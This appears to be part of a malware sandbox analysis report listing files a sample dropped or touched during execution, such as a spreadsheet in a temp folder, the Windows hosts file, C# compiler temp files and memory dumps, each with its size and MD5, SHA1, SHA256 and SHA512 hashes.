32c253634e4509fb9c2f43daa209ceeb42df6ae014840a206fa2cb1830fa47a2cac4e344d63694dce139b25b18a057f16a4b985f03f39ceea9879d6a5bdd920b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SuspendAssert.xlsx

Filesize
293KB

MD5
aded64c5aba0db1302267265d4fe14e5

SHA1
068ac31dab7c67ddcd1d864dee0ac524bad20299

SHA256
8d61de5357785ffdb0c27b299385281ad678aae432498ae71642833eac76386a

SHA512
5d702af9a15553b316fcbe3d12020d04c2ea34b29ee4f2a9c3a4956bf1a11fb73eaff70060b7f099d7e3e17abb8ff2bf3529f2962de4842e3aa6596374268717

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wjzgxjru\CSC87BCC3F98F874CD893E0DA5AFB702575.TMP

Filesize
652B

MD5
67fa0ff4a581631fe3db1b4320479257

SHA1
e515b7ce3120bf00116d9847c130f09c597d7c86

SHA256
92a77239f2bbef15fcc8d2bf2c408aca76cd7e5df0c359cf26628d71523c9ebd

SHA512
e54e78a0ab6998667d1bb9b57ae3ed7e654fd0ef6d2c7ff69d3747a6bb3eaf32dd58ae90a6e166aef7e2134bf8bc4750a1ac516a182b2ff8e9b3e3b4db913c8d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wjzgxjru\wjzgxjru.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wjzgxjru\wjzgxjru.cmdline

Filesize
607B

MD5
1e7faa25c4cea8e73973fc9d61cabf7b

SHA1
9dadab15b705eebd228783783cb31dfe6349b82d

SHA256
f935eacad9465aa21ac689e20d99880e77ddce2802d9d2e74934067bd246af1a

SHA512
e6223d3c2ca584b29606c1d3db8e72bf42d4947ddc265ae81861bc39335c4aef6a5198c8746da8b40909f1a3cf1da13ef823603b5b6f8dfe10194597ac35eaf3

Download Submit
memory/3376-63-0x000002EA7D1B0000-0x000002EA7D1D2000-memory.dmp

Filesize
136KB

Download
memory/3432-184-0x00000196F7770000-0x00000196F7778000-memory.dmp

Filesize
32KB

Download